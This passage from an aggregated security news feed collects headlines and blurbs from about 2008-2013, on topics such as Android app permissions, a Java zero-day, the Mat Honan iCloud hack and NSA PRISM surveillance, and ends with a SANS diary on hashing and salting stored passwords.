yourself.

==> Study finds 25 percent of Android apps to be a security risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ According to a new report from Bit9--a security vendor with a focus on defending against advanced persistent threats (APT)--there is a one in four chance that downloading an Android app from the official Google Play market could put you at risk. Bit9 analyzed 400,000 or so apps in Google Play, and found over 100,000 it considers to be on the shady side. Does that mean that the sky is falling, and everyone with an Android smartphone or tablet should abandon it immediately? No. The research by Bit9 illustrates some issues with app development in general, and should raise awareness among mobile users to exercise some discretion when downloading and installing apps, but it's not a sign of any urgent crisis affecting Android apps. Use discretion rather than blindly granting permissions to apps. The report from Bit9 isn't about apps that contain malware, or are even overtly malicious for that matter. Bit9 reviewed the permissions requested by the apps, and examined the security and privacy implications of granting those permissions. The reality is that many apps request permission to access sensitive content they have no actual need for. Bit9 says that 72 percent of all Android apps in the Google Play market request access to at least one potentially risky permission. For example, 42 percent request access to GPS location data, 31 percent want access to phone number and phone call history, and 26 percent ask for permission to access personal information. Bit9 discovered 285 apps that use 25 or more system permissions.

==> Webroot SecureAnywhere 2013 adds protection for Mac OS X

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Webroot SecureAnywhere 2013 is here. The new security suite from Webroot includes a variety of updates in the areas of performance, and the overall user experience. But, the most notable feature of SecureAnywhere 2013 is that it now also protects Mac OS X. Let's start with a look at SecureAnywhere in general. While the overall goal of the software is the same as competing antimalware and security suites, and it seems logical to compare them, SecureAnywhere is a whole new approach. Webroot completely threw out its flagship products, and started over by building SecureAnywhere around a more proactive philosophy based off the acquisition of Prevx. Webroot SecureAnywhere is a whole different approach to defending against malware. The result is protection for your PCs and mobile devices that delivers blazing performance, and has virtually no impact on system resources compared with the traditional approach of rival products. The entire install occupies a mere 750KB--with a K--on your hard drive. It installs in seconds, and according to metrics from Webroot, the software uses 91 percent less memory than competitors, and completes full system scans in about a minute--116 times faster than average antimalware scans. SecureAnywhere is a comprehensive security suite that includes a built-in firewall (only in Webroot SecureAnywhere Complete 2013), identity and privacy protection, social network protection, and seven specialized security shields--three of which are new to SecureAnywhere 2013. The USB Shield blocks attacks and malware from removable drives, the Offline Shield protects the system against persistent threats even when it's not connected to the Internet, and the Zero Day Shield identifies new or changing threats to defend against emerging attacks.

==> The FBI’s Next Generation Identification program could spot faces in a crowded street

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The FBI is getting ready to roll out a new nationwide program to better identify criminals called the Next Generation Identification (NGI) project. The new program is expected to add biometric data to the Bureau's toolkit with iris scans, DNA analysis, voice identification, and even the ability to pick out a person's face in a crowded street using surveillance cameras. The FBI and Lockheed Martin Transportation and Security Solutions, who won the NGI contract, have received $1 billion to make its NGI project a reality. According to New Scientist, a handful of states have already created a criminal photo database as part of an NGI pilot program that will go nationwide by 2014. Theoretically, the NGI system would be able to use its mugshot database to pick out criminals in a crowd using a face-matching algorithm. The program would scan for faces in footage taken by security cameras or public images uploaded to the Internet. The algorithm would then return a number of hits for investigators to look into. Of course, this sort of surveillance raises some obvious privacy concerns. The FBI states that it has conducted a Privacy Impact Assessment for NGI and that the program falls in line with the Privacy Act. In other words, it's totally legal and is not considered law enforcement overreach.

==> Apple device IDs hacked: What you need to know

http://feeds.pcworld.com/pcworld/blogs/security_alert/ A hacker collective known as AntiSec has published over a million Apple device IDs that it claims were captured from the laptop of an FBI agent. If you own an iPhone or iPad, you might be wondering what this hack means to you, and you might also be curious about why the FBI had your Apple UDID in the first place. The information was acquired and released by the hackers as a political statement. The lengthy diatribe posted on Pastebin along with the hacked Apple ID info rants about government oppression and hypocrisy. Why does the FBI have 12 million Apple device UDIDs on a laptop? While the group has published one million and one hacked Apple device IDs, it should be given at least a little credit for restraint. The details stolen from the FBI laptop included more personal information as well--such as full names, cell phone numbers, addresses and zip codes. According to the letter from AntiSec, there were approximately 12 million Apple device IDs stored in the file on the FBI laptop. It chose to release just a portion rather than publishing all 12 million. AntiSec could have simply published the data it acquired without scrubbing it first, but the point it's trying to make is against the government and the FBI--not the individuals whose information happened to be in the hands of the FBI.

==> Plan X: DARPA’s Cyberwar

http://feeds.pcworld.com/pcworld/blogs/security_alert/ DARPA, if you didn't know, stands for Defense Advanced Research Projects Agency. It's the government body that develops ridiculous things like flying tanks and other science fiction. Next month, however, DARPA is hitting closer to home with Plan X, a one-day workshop designed to flesh out the U.S. government's strategy for war in cyberspace. Plan X is a two-pronged affair that consists of a general-access session for your standard contractors and government employees, and a secret session to map out where the US is going in the future of cyber warfare. What will it deal with, specifically? The event won't get into research and development of cyberweapons or vulnerability analysis. It's geared towards defense: In the session, DARPA will focus on ways to create revolutionary technologies for understanding, planning, and managing cyberwarfare in realtime, large-scale and dynamic network environments, as well as how to research the nature and history of cyberwarfare. It's all to dominate the cyber battlespace, according to a publicly available PDF on the matter.

==> Does Oracle Patch for Java 7 Fix the Zero-Day Flaw?

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Oracle issued a patch today for Java 7. Coincidentally, Java 7 has also been the target of recent attacks thanks to a zero-day exploit. For now, though, it's anyone's guess whether or not the new Java 7 patch actually addresses the zero-day exploits, or to what extent. First, a brief recap. A previously unknown flaw in Java was discovered, and a proof-of-concept (PoC) exploit was developed in the popular Metasploit Framework tool. Metasploit is a tool used by the good guys, but an exploit is an exploit, and the fact that the exploit PoC code was developed for Metasploit means that the exploit is now in the hands of many more would-be attackers. Oracle already knew about the 'zero-day' flaws, so hopefully this patch fixes them. According to the normal Oracle patch release schedule, the next routine update isn't supposed to occur until October. However, Java is a popular and widely used platform, and it would probably be catastrophic for Oracle to wait a month or more to produce a patch. Fast forward a few days, and voila! A patch. Maybe. There is definitely an update for Java 7 available from Oracle. However, it's not yet clear what it fixes.

==> Warning: Java Zero Day Flaw Under Attack

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Java is under attack again. A zero-day vulnerability in Java is being actively exploited in the wild. The current attacks seem to be targeted, but security experts warn that more widespread attacks could be imminent. Next to Adobe Reader and Adobe Flash, Java is probably one of the most ubiquitous and widely used applications. Unfortunately, it also provides attackers with plenty of holes and vulnerabilities to exploit, which makes it a popular target. Security experts warn users to expect more exploits of the Java zero-day. Proof-of-concept (PoC) code has been developed for the Metasploit Framework tool. Wolfgang Kandek, CTO of Qualys, explains that this is concerning because it makes the exploit available to a much wider audience, and probably means more attacks targeting the Java vulnerability are on the horizon. Andrew Storms, director of security operations for nCircle, is concerned that it could be a while before a patch or update is released to resolve the vulnerability and guard against these attacks. Oracle isn't known for releasing patches out of cycle and the next scheduled update for Java isn't until October. Part of the problem is that Java is so ubiquitous that it tends to be overlooked as a small piece of software.

==> Has Android Malware Tripled in Recent Months? Not So Fast

http://feeds.pcworld.com/pcworld/blogs/security_alert/ There never seems to be any shortage of Android malware reports circulating in the news, and today one came out that sounds alarming indeed. "Android Under Attack: Malware Levels for Google's OS Rise Threefold in Q2 2012" was the title of the press release from antivirus vendor Kaspersky announcing it, in fact, and right on cue headlines are popping up across the tech media echoing that dire warning. But is it really as bad as all that? Probably not. In fact, as pointed out by security-focused publication The H on Thursday, data from competing firm F-Secure paint a very different picture for the very same time period. In fact, rather than a tripling of Android malware in the second quarter, F-Secure found only a modest rise. How to explain the difference? It's all a matter of methodology, according to The H, which calls F-Secure's approach more sophisticated.

==> Gauss Cyber Espionage Threat Targets Banking Info

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Gauss joins the ranks of Stuxnet, Duqu, and Flame as an apparently state-sponsored tool of cyber espionage. This latest threat appears to be built from the same code foundation as Flame, and specifically targets bank credentials and financial data. Kaspersky Lab--the largest privately held vendor of antimalware and endpoint security products--announced the new threat. A Kaspersky FAQ about Gauss boils the description of Gauss down to a 140-character tweet: "Gauss is a nation state sponsored banking Trojan which carries a warhead of unknown designation." Gauss seems to come from the same code foundation as Flame. Gauss has been flying under the radar and evading detection since the fall of 2011. Ironically, it was discovered during operations initiated by the International Telecommunications Union (ITU) in the wake of Flame in an effort to detect and mitigate any other stealthy cyber threats. Mission accomplished. Kaspersky was able to detect and identify the threat--dubbed Gauss because its main module is named after the German mathematician Johann Carl Friedrich Gauss--because it uses a similar architecture, module structure, code base, and methods of communication with command and control (C&C) servers as its cousin, Flame.

==> Mat Honan Hack Pokes Holes in Apple iCloud

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The hackers that hijacked Mat Honan's online life, took over his Twitter account(s), and wiped out his iPhone, iPad, MacBook, and Google accounts in one fell swoop showed some perseverance in achieving that goal. Not all attackers are quite that determined, but the hack still demonstrates some serious flaws in Apple's iCloud and the iCloud security model. My iPhone, iPad, and MacBook Air are all synced through Apple's iCloud--just like Mat Honan. I appreciate the convenience and simplicity of the fact that I can add a contact on my iPad, and it will automatically sync to the other two devices. I can take a picture with my iPhone, and the photo will be available from the iPhone and MacBook as well. It just works. With one username and password I can pinpoint or remotely wipe all of my Apple devices. The Mat Honan hack is a poignant illustration of how "it just works" can be a double-edged sword. If it just works for you, it also just works for an attacker who manages to gain access to your iCloud account. The first potential problem with the automatic syncing is that someone with possession of my iPhone or iPad could wreak havoc. If someone starts deleting contacts, calendar events, or other synced information, those changes should be automatically synced across to the other devices which would mean losing the information on all of them because it just works.

==> How Did Apple Allow Hackers to Access iCloud Account?

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The Internet is abuzz this weekend as a result of the Gizmodo Twitter account getting hijacked. That incident was traced back to the hack of an Apple iCloud account--allegedly accomplished through social engineering. A Forbes.com story from Adrian Kingsley-Hughes explains that a former contributor for Gizmodo, Mat Honan, was the original victim of the attack. Hackers were able to access Honan's iCloud account, and remotely wipe his iPhone, iPad, and MacBook. The original theory was that the hackers used a brute force attack to crack Honan's iCloud password, but further investigation revealed that social engineering was used to convince Apple the attackers were Honan, and Apple gave them the keys to walk right in. It took me months to "social engineer" my way into my own Apple ID account. Color me incredulous! Why? Well, I have my own story of Apple woe--and it's the exact opposite experience. I somehow lost access to my own email address for use on iTunes, iCloud, and other Apple services, and it took months of fighting with Apple Support to finally get to the bottom of things and get into my own account. I couldn't get Apple Support to give me access to my own account, never mind someone else's.

==> Can Congress Protect the Nation's Critical Infrastructure?

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The nation's critical infrastructure is at risk--a well-executed cyber attack could have a potentially devastating effect. Congress is trying to patch some of the holes with legislation, but a recent survey found that most security experts have little faith that government regulation can do the trick. Sensational attacks against the critical infrastructure make for great stories in books like Zero Day: A Novel by respected security expert Mark Russinovich, or perhaps something from Dan Brown. But many security experts believe that we are in very real danger of such attacks moving from fiction to reality, and that we are woefully unprepared to defend against, or respond to, them. Most of our elected officials are simply not qualified to craft information security legislation. What is the critical infrastructure? Executive Order 13010, signed by President Clinton on July 15, 1996, established the President's Commission on Critical Infrastructure Protection. It explains, "Certain national infrastructures are so vital that their incapacity or destruction would have a debilitating impact on the defense or economic security of the United States." Natural gas, electricity, drinking water, nuclear facilities, roads and highways, air traffic, railroads, and the Internet itself can all be classified as being part of our critical infrastructure.

==> How to choose an office security system

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Protect Your Assets: A Buying Guide to Office Security Systems. We talk frequently about cybersecurity, discussing how to protect your business's data by using strong passwords, deploying antimalware utilities, and keeping your computers safe with the latest patches and updates. This time, the focus is on premises security, or protecting your business's physical assets from burglary and vandalism. The best cybersecurity measures in the world are useless if a thief breaks into your office and makes off with your computers. You won't lose any digital data if you've followed our advice to back up your computers to secure, offsite locations; but if your business is like most operations, it isn't entirely digital. You have paper records, including sensitive personal information about your employees. Your business also depends on physical assets--computers, displays, servers, fax machines, and everything that goes with them--that you will need to replace if someone steals them or destroys them. Can you afford that kind of disruption?

==> Mac OS X Targeted By Clever New Trojan

http://feeds.pcworld.com/pcworld/blogs/security_alert/ A new Mac malware threat has been discovered. The OSX/Crisis Trojan is an insidious, clever threat. Mac users should take steps to defend against this new malware, and proactively defend against future threats while they're at it. OSX/Crisis is uniquely sneaky. First of all, the malware is cross-platform. It identifies the operating system, and executes different instructions depending on whether the target is a Windows or Mac OS X system. The malware is capable of infecting OS X 10.6 Snow Leopard and OS X 10.7 Lion systems without requiring a password, or any user intervention. Once it infiltrates the system, it exhibits different behavior depending on whether or not it has Admin level privileges on the target. OSX/Crisis is exceptional in its ability to adapt on the fly to attack a broader range of targets. Curtis Fechner, Webroot threat research analyst, explained, "We've been looking at this and it's quite complex, as well as fascinating. I think the most important opinion we've formed is that we see more threats for the Mac platform like this one on the horizon."

==> It's a Huge Mistake to Remove Password Prompt for Free Apps in iOS 6

http://feeds.pcworld.com/pcworld/blogs/security_alert/ According to sources with access to the developer beta of iOS 6, the next version of Apple's mobile operating system will allow users to download and install free apps without requiring a password. If Apple doesn't fix that before iOS 6 is officially launched, it will significantly impair the security of iOS devices. iOS has established a reputation as the more secure mobile platform. The walled garden of the Apple App Store, and the scrutiny apps must go through before they're available, provide additional layers of defense lacking in other mobile operating systems. Apple is choosing convenience over security by removing the password requirement in iOS 6. In this case, though, Apple seems to be choosing functionality and expediency over security. It's a decision that could come back to haunt Apple, and all iOS users. Andrew Storms, director of security operations for nCircle, does not approve. "The decision to remove password authentication from free app downloads is just another example of Apple making consumers responsible for their own security, and that's always risky at best."

==> Emerging threats include kinetic attack, offensive forensics: RSA 2013

http://feeds.pheedo.com/tt/1323 At RSA 2013, experts Ed Skoudis and Johannes Ullrich explained how the SANS CyberCity supports offensive forensics and helps prevent kinetic attacks.

==> Bad outsourcing decisions cause 63% of data breaches

http://feeds.pheedo.com/tt/1323 Bad outsourcing decisions caused nearly two-thirds of data breaches investigated by security firm Trustwave in the past year.

==> Cyber attacks on trust could cost top firms $398m, says Ponemon

http://feeds.pheedo.com/tt/1323 Every Global 2000 organisation faces $398m in potential losses from new and evolving attacks on their ability to control trust with cryptographic keys and digital certificates, a study has revealed

==> Audits and compliance requirements for cloud computing

http://feeds.pheedo.com/tt/1323 Even as India Inc experiments with the cloud, security concerns play spoilsport. These cloud computing audit and compliance tips will make your journey easier.

==> Cutwail botnet spam campaign tied to Zeus banking Trojan

http://feeds.pheedo.com/tt/1323 The cybercriminals connected to the notorious Zeus Trojan are using the Cutwail botnet to distribute spam designed to steal account credentials.

==> PCI validation: Requirements for merchants covered by PCI DSS

http://feeds.pheedo.com/tt/1323 Mike Chapple details the PCI validation requirements for merchants covered by PCI DSS.

==> VoIP security strategy helps WNS tackle cross-party risk

http://feeds.pheedo.com/tt/1323 Indian BPO major WNS ensures robust risk management and PCI-DSS compliance through simple VoIP security solution, despite outdated client infrastructure.

==> Analysis: Windows 8 security features improve on Windows 7 security

http://feeds.pheedo.com/tt/1323 Expert Michael Cobb says Windows 8's security features, like Windows Defender and Secure Boot, are a step forward for desktop and BYOD security.

==> Study finds spear phishing at heart of most targeted attacks

http://feeds.pheedo.com/tt/1323 Malicious file attachments are typically used as the payload, according to a report issued this week by Trend Micro.

==> Security business analyst – a role whose time has come

http://feeds.pheedo.com/tt/1323 For effective information security, India Inc requires security business analysts. These should be people who understand security, technology and the business.

==> Mitigate phishing attacks in the cloud: A how-to

http://feeds.pheedo.com/tt/1323 As Indian enterprises increasingly move to the cloud, so are phishing attempts. Here are some ways to mitigate the risks of phishing in the cloud.

==> Study finds most antivirus products ineffective

http://feeds.pheedo.com/tt/1323 Slow updates to signature databases cause some antivirus products to be ineffective against known threats, according to a study by security firm Imperva.

==> Zenmap tutorial: Mapping networks using Zenmap profiles

http://feeds.pheedo.com/tt/1323 Video: In this Zenmap tutorial screencast, Keith Barker of CBT Nuggets explains how to efficiently map networks graphically using Zenmap profiles.

==> Combat social engineering attacks with these mantras

http://feeds.pheedo.com/tt/1323 Of all the security threats, those involving the human angle are perhaps the deadliest. Keep social engineering at bay with these tips.

==> Phishing attack, stolen credentials sparked South Carolina breach

http://feeds.pheedo.com/tt/1323 A phishing attack and stolen credentials gave an attacker access to the systems of the South Carolina Department of Revenue for two months.

==> Cloud security begins with the contract, says expert

http://feeds.pheedo.com/tt/1323 Enterprises must empower their legal teams to ask the right questions and write contracts based on risk management, explains Tom Kellermann of Trend Micro.

==> Deception, proactive defenses can better protect IP, says expert

http://feeds.pheedo.com/tt/1323 Deceptive environments, phony data in the enterprise can fool attackers and increase the cost of hacking, says noted cybersecurity expert Paul Kurtz.

==> After antimalware: Moving toward endpoint antivirus alternatives

http://feeds.pheedo.com/tt/1323 Is it time to "cut the cord" with endpoint antimalware? Matthew Pascucci discusses possible antivirus alternatives.

==> PCI Council: Risk assessment methodology unique to company environment

http://feeds.pheedo.com/tt/1323 The PCI Risk Assessment Special Interest Group concludes that risk assessments are based on a company's unique risk tolerance and environment.

==> First Lawsuit Over NSA Phone Scandal Targets Obama, Verizon

http://feeds.wired.com/wired27b The first of what likely will be many lawsuits challenging the constitutionality of the NSA's dragnet phone surveillance program was lodged Sunday, calling the newly disclosed operation an "outrageous breach of

==> Spy Court Urged to Unmask Legal Basis for NSA Dragnet Phone Surveillance

http://feeds.wired.com/wired27b Does the Patriot Act really give the secretive Foreign Intelligence Surveillance Act Court the authority to require telephone carriers supply a feed of all calling metadata? The court's legal rationale on

==> What’s in the Rest of the Top-Secret NSA PowerPoint Deck?

http://feeds.wired.com/wired27b What’s in NSA whistleblower Edward Snowden’s 41-slide PowerPoint deck that’s so hot

==> NSA Whistleblower: The Ultimate Insider Attack

http://feeds.wired.com/wired27b Edward Snowden might well be the ultimate inside attacker, since he had not only that rarest of rare views into the core of the intelligence rabbit hole but also the

==> NSA Contractor Outs Himself as Source of Surveillance Documents

http://feeds.wired.com/wired27b Edward Snowden, a former technical employee for the CIA and current contractor for the NSA, has outed himself as the source of a string of explosive documents describing NSA surveillance activities against

==> Intel Director Sets Record Straight on PRISM, Sort Of

http://feeds.wired.com/wired27b Following a two-day storm of media headlines and company denials, the director of national intelligence has finally fully entered the fray to release a FAQ

==> Zuckerberg, Page: NSA Has No ‘Direct Access’ to Facebook or Google Servers

http://feeds.wired.com/wired27b Facebook chief Mark Zuckerberg and Google CEO Larry Page both denied today that they’ve given U.S. spies access to their companies’ backend servers, deepening the core mystery around the NSA’s newly-disclosed PRISM

==> Obama Asked Intel Agencies to Draw Up List of Possible Cyber Targets Overseas

http://feeds.wired.com/wired27b President Barack Obama ordered U.S. intelligence agencies to draw up a list of possible overseas targets for offensive cyberattacks, according to a

==> NSA Is Wired Into Top Internet Companies’ Servers, Including Google and Facebook

http://feeds.wired.com/wired27b The NSA and FBI directly tapped central servers belonging to nine U.S. internet firms, in order to get a constant feed of audio, video, photos, emails and documents as well as connection logs, according to

==> Also Revealed by Verizon Leak: How the NSA and FBI Lie With Numbers

http://feeds.wired.com/wired27b While the feds are required to disclose the number of orders they apply for and receive, they aren't required to say how many people are targeted in each order. So a single order issued to Verizon Business Solutions

==> I Totally Owned Your Grandma…

http://hellnbak.wordpress.com/feed/ This was originally written by me and posted here as a guest blog: http://www.zdnet.com/blog/feeds/i-totally-owned-your-grandma-aka-social-networks-as-attack-platforms/2838 Guest editorial by Steve Manzuik. Lately there has been a lot of attention given to various privacy issues of social networking sites. Whether it is Google's Buzz automatically adding anyone you have ever emailed to your follow list or the [...]

==> Now for Something Completely Different

http://hellnbak.wordpress.com/feed/ Apologies to those who follow this blog just for my security geek content. But this time I am posting something completely different. For the three years I have lived in the bay area I have been partially a San Jose Sharks hockey fan as well as a Calgary Flames fan. I have taken all kinds [...]

==> Backpeddled But Still Very Wrong

http://hellnbak.wordpress.com/feed/ I guess all of the attention that the mindless blog post by eEye created has caused them to backpeddle quite a bit. Sadly Morey is still way off the mark and if anything just made it more clear that he is attempting to use this as a reason you should buy their product and not use the [...]

==> How The Mighty Have Fallen

http://hellnbak.wordpress.com/feed/ Full Disclosure: I am a former eEye employee and managed their now pretty much dead Research Department. Something of which, after reading this post, I can honestly say I am embarrassed to admit. This is a classic case of the insane taking over the asylum. This morning a friend of mine pointed out this blog [...]

==> Apparently Time Has Reversed – Not The Disclosure Debate Again?!?

http://hellnbak.wordpress.com/feed/ Remember back in 2001 when researchers were compared to Terrorists and the term “Information Anarchy” was coined? You can read this blast from the past here –> http://www.windowsitpro.com/article/windows-client/information-anarchy-the-blame-game-.aspx As the saying goes, those who do not learn from history are doomed to repeat it, or something like that we have this clueless blog post over [...]

==> Murder – Just Like In The Video Games

http://hellnbak.wordpress.com/feed/ By now I am sure most of you have seen the “Collateral Murder” video that was released via Wikileaks. I do not want to get involved with the arm chair debates over what should or should not have happened. I have no real military experience to speak of unless being chased off a Canadian base [...]

==> Creepy GMail “Feature”

http://hellnbak.wordpress.com/feed/ I stumbled upon this creepy GMail “feature” the other day. Basically, it appears that there is some logic that notices when you type the phrase “see the attached” and then checks for a file attachment alerting you if you fail to attach a file. With all the privacy concerns around GMail I found this to [...]

==> Nexus-1 Honeymoon is Over

http://hellnbak.wordpress.com/feed/ As many of my friends know. I am very hard on my electronics. My laptops, my MP3 players, my cell phones and even the TV remote all get abused in various ways. So, in typical bleep fashion, over the weekend I dropped my Nexus-1 phone and sadly, even though it wasn’t a far fall - a couple [...]

==> Clueless FUD Article…

http://hellnbak.wordpress.com/feed/ I haven’t blogged anything of good use lately so I thought I would start up again by calling out this completely useless and incorrect opinion piece. On the Dark Reading blog an article appeared entitled “Share – Or Keep Getting Pwned”. Sigh. Clearly zero research was done into this posting as there really is a lot of [...]

==> Week 23 in Review – 2013

http://infosecevents.net/feed/ Resources The Ultimate Guide to Finding and Using Free Images On Your WordPress Site – wpmu.org Blog writing can involve a lot of blood, sweat and tears, unless you're one of those magical people who can tap out an insightful post with inexplicable ease or some kind of deus ex machina intervention. Calling NTDLL Functions [...]

==> Week 22 in Review – 2013

http://infosecevents.net/feed/ Event Related CONFidence 2013 and the x86 quirks – gynvael.coldwind.pl Another week, another conference. Just a few days ago, Gynvael and I had the pleasure to attend and present at the CONFidence 2013 infosec conference traditionally held in Cracow, Poland. [Announcement] Blackhat Arsenal USA 2013 Selected Tools – toolswatch.org I’m pleased to announce the selected [...]

==> Information Security Events For June

http://infosecevents.net/feed/ Here are information security events in North America this month: Techno Security Conference : June 2 to 5 in SC, USA SummerCon : June 3 to 8 in New York USA CISO Executive Summit Ohio : June 5 in Cincinnati, OH USA BSides Detroit : June 7 to 8 in Detroit, [...]

==> Week 21 in Review – 2013

http://infosecevents.net/feed/ Event Related SOURCE Dublin SOURCE Dublin Wrap-Up Day #1 – blog.rootshell.be I flew on Wednesday evening to Dublin, Ireland to attend the SOURCE conference (previously, it was organised in Barcelona). The conference was held in the Trinity College, in the centre of the city. SOURCE Dublin Wrap-Up Day #2 – blog.rootshell.be This second day started [...]

==> Week 20 in Review – 2013

http://infosecevents.net/feed/ Event Related NoSuchCon #1 Wrap-Up – blog.rootshell.be So, let's welcome the newly born conference called NoSuchCon. The first edition was just organized in Paris across the last three days. Resources Download: Mobile Threat Report Q1 2013 – f-secure.com All of our past reports are also available in the “Labs” section of f-secure.com. Big Iron Back [...]

==> Week 19 in Review – 2013

http://infosecevents.net/feed/ Event Related SyScan 2013 SyScan13: Revisiting Mac OS X Rootkits presentation – reverse.put.as SyScan 2013, 10th anniversary edition is over! It is a great conference and I hope it does not end here. I had lots of fun and met new interesting people. Thomas is an awesome host! It helps that I really like Singapore [...]

==> Week 18 in Review – 2013

http://infosecevents.net/feed/ Event Related Syscan 2013 SyScan 2013, Bochspwn paper and slides – gynvael.coldwind.pl In our SyScan presentation, we explained the concept of kernel race conditions in interacting with user-mode memory, gave a brief rundown on how they can be identified by using CPU-level instrumentation of an operating system session, and later focused on how they can [...]

==> Information Security Events For May

http://infosecevents.net/feed/ Here are information security events in North America this month: Bsides San Antonio : May 4 in San Antonio, TX USA Secure360 : May 13 to 15 in Minnesota USA GovSec : May 13 to 15 in Washington DC USA HackMiami 2013 : May 17 to 19 [...]

==> Week 17 in Review – 2013

http://infosecevents.net/feed/ Event Related Notacon 10 (2013) Videos – irongeek.com These are the videos from the 10th Notacon conference held April 18th-21st, 2013. Not all of them are security related, but I hope my viewers will enjoy them anyway. Thanks to Froggy and Tyger for having me up, and to the video team: SatNights, Widget, Securi-D, Purge, [...]

==> Week 16 in Review – 2013

http://infosecevents.net/feed/ Event Related Great Scott Gadgets Infiltrate 2013 – greatscottgadgets.com Michael Ossmann and Kyle Osborn presented Two-Timing Data Connectors at Infiltrate 2013. Resources Nessus Using Posh-SecMod PowerShell Module to Automate Nessus(Part1) – darkoperator.com One showed me some of the scripts they use and then it came to me why not automate Nessus from within PowerShell. [...]

==> The blog has moved…

http://infosecramblings.wordpress.com/feed/ After much thought and consideration, I decided to move my blog from wordpress.com to my own domain. The decision has nothing to do with the service provided by wordpress.com. I have never had any problems with this blog while it has been hosted by wordpress.com. There are other things I want to do with the […]

==> Interesting Information Security Bits for 11/07/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Virtualization: How to Isolate Application Traffic Lori has penned a nice article pointing out how we can use VLANs to isolate application traffic. She makes an excellent point in the article, “we’ve grown to […]

==> Interesting Information Security Bits for 11/06/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. TaoSecurity: Defining Security Event Correlation Richard has a good post up on defining security event correlation. Go check it out. Why use Firefox << Techdulla Techdulla tells us why he uses Firefox for his […]

==> Interesting Information Security Bits for 11/05/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. CSI Stick – So who has a copy of your phone? << SANS Computer Forensics, Investigation, and Response This is both very cool and very scary. Tool that allows you to quickly and easily […]

==> Interesting Information Security Bits for 11/04/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. /dev/random >> Blog Archive >> Critical dns2tcp Vulnerability! Looks like dns2tcp has a vulnerability that needs to be taken care of. Time to upgrade. TrueCrypt – Free Open-Source On-The-Fly Disk Encryption Software for Windows […]

==> Resources to increase your info security knowledge and benefit your infosec career…

http://infosecramblings.wordpress.com/feed/ @GeekGrrl posted a note on her blog asking this question: 1) How would you recommend getting started on a career toward Network Security/Network Pen Tester? She has some follow-up questions to that first one requesting some specific information. Go read her post and then come back. . . . . Okay, here is what I […]

==> Who needs employee exit procedures and disaster recovery plans are for whimps…

http://infosecramblings.wordpress.com/feed/ This article talks about the conviction of Pryavrat Patel for actions he took after his long-term contract employment with Pratt-Read was terminated. Now, what Mr. Patel did was definitely wrong, but frankly, Pratt-Read should probably put some thought into how they dealt with the situation too. It took them two weeks to recover from the […]

==> Recap: RSA Europe 2008 Day 2

http://infosecramblings.wordpress.com/feed/ Hello again. Day 2 of RSA Europe 2008 was a busy one. I attended several sessions during the day and then the Security Catalyst, Security Bloggers, Security Twits get together happened that evening. This post will only talk about the day. The meet-up post will be later. Without further ado, let’s get to it. ‘The […]

==> Recap: RSA Europe 2008 Day 1

http://infosecramblings.wordpress.com/feed/ Hi there folks. I am home and somewhat rested from my trip to London for the RSA Europe 2008 conference. It was a great trip and I enjoyed the conference. Below is a recap of my first day. This is going to be long, so hang in there. Information Security: From Ineffective to Innovative Arthur […]

==> Store passwords the right way in your application, (Tue, Jun 11th)

http://isc.sans.org/rssfeed_full.xml I suspect most of our readers know this, but it can't hurt to repeat this every so often as there is a lot of confusion on the issue. One thing that gets to me is seeing reports of website compromises that claim "the passwords were hashed with SHA-256". Well at face value that means 90% of the passwords were decoded before the news hit. If you have an application that's protected by passwords, there are a few rules to follow:

Rule #1: Never store plain passwords, use a hash

The worst case solution is that passwords are stored as is. Any attacker breaking in to the application now has everything they need to impersonate any user in your application. But typically they have much more: your users typically reuse passwords, so there's no telling to how far this goes. And if the application is e.g. a webmail solution: well all accounts that can be reset by sending an email here are now essentially broken as well. A hash function is a one-way function: it converts input to output but there is no easy way to reverse the process. There's a whole bunch of algorithms commonly used. The goal/advantage here is that even if the attacker takes away the user tables, he's still got some work to do. Unfortunately the work is doable so we need more ...

Rule #2: Use a salt

Attackers can precompute (or buy) so called rainbow tables: it's a list of precomputed password -> hash values and as such decoding any common password is as fast as a lookup to them gets. A salt is essentially a random string chosen at the time of password change or creation and stored along with the hash and concatenated to the password. This makes rainbow tables useless. But it's still not enough...

Rule #3: Use a slow hash function

This rule is most often forgotten, yet it is so critical. The most common hash functions we use daily (e.g. SHA-256) are designed to be fast. But for storing passwords that's going to work against us big time. Even if the attacker can't break SHA-512 in a brute force fashion, even if they can't use rainbow tables due to salts being used, they still will find the vast majority of the passwords our users can remember in a matter of minutes to hours if you use a fast hash. So you need to use a slow hash function. Since there's a Rule #0 in all things crypto: Don't invent your own: Just use the appropriate functions already there. Many of these slow hash functions allow one to choose the cost. If so, set it as high as you can bear with your current hardware.

Examples

In PHP one can use the crypt function using blowfish or many thousands of rounds of SHA-256 or SHA-512 instead of a simple hash function. Or even better if the cryptographic password hashing extension is installed, use it as it has simple support for e.g. rehashing passwords to update the strength of a hash of a stored password upon login of the user. Feel free to add comments on how to do it in other languages.

-- Swa Frantzen -- Section 66 (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Tuesday, June 11th 2013 http://isc.sans.edu/podcastdetail.html?id=3359, (Tue, Jun 11th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> When Google isn't Google, (Mon, Jun 10th)

